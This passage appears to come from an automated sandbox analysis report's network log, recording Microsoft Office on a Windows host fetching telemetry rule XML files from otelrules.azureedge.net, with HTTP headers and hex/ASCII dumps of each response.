                                                                                                                                                                                                                                                              2024-11-27 15:32:12 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              114192.168.2.104983213.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:13 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:13 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:13 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1401
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BE2A9D541"
                                                                                                                                                                                                                                                              x-ms-request-id: 2150929f-401e-0064-4382-3f54af000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153213Z-174f7845968swgbqhC1EWRmnb40000000x7g00000000gfh0
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:13 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              115192.168.2.104983413.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:13 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:13 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:13 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1391
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BDF58DC7E"
                                                                                                                                                                                                                                                              x-ms-request-id: 32ac4486-a01e-0050-5791-3fdb6e000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153213Z-174f7845968qj8jrhC1EWRh41s0000000x5g00000000088z
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:13 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              116192.168.2.104983313.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:13 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:13 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:13 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1364
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BEB6AD293"
                                                                                                                                                                                                                                                              x-ms-request-id: 97972df5-901e-008f-1591-3f67a6000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153213Z-174f7845968j6t2phC1EWRcfe80000000x6000000000nwry
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:13 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              117192.168.2.104983813.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:14 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:14 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1403
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BDCDD6400"
                                                                                                                                                                                                                                                              x-ms-request-id: bc9cf7b6-201e-0096-1454-40ace6000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153214Z-174f7845968xlwnmhC1EWR0sv80000000x10000000005d7n
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:14 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              118192.168.2.104983513.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:14 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:15 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:15 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1354
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BE0662D7C"
                                                                                                                                                                                                                                                              x-ms-request-id: 32ac451f-a01e-0050-6491-3fdb6e000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153215Z-174f784596886s2bhC1EWR743w0000000x3000000000km3b
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:15 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              119192.168.2.104984013.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:15 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:15 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:15 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1366
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BDF1E2608"
                                                                                                                                                                                                                                                              x-ms-request-id: 75b435a0-401e-0048-0433-400409000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153215Z-174f7845968pf68xhC1EWRr4h80000000xa000000000hn5z
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:15 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              120192.168.2.104984113.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:15 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:16 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:15 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1399
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BE8C605FF"
                                                                                                                                                                                                                                                              x-ms-request-id: 8a8d0990-701e-0021-2191-3f3d45000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153215Z-174f7845968jrjrxhC1EWRmmrs0000000xbg0000000027qe
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:16 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              121192.168.2.104984313.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:15 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:16 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:15 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1362
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BDF497570"
                                                                                                                                                                                                                                                              x-ms-request-id: f58682e1-d01e-0049-553e-40e7dc000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153215Z-174f7845968frfdmhC1EWRxxbw0000000x2000000000nn0x
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:16 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              122192.168.2.104984413.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:16 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:17 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:16 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1403
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BDC2EEE03"
                                                                                                                                                                                                                                                              x-ms-request-id: 17f40f6b-801e-00a3-7e91-3f7cfb000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153216Z-174f7845968swgbqhC1EWRmnb40000000xcg0000000007f0
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
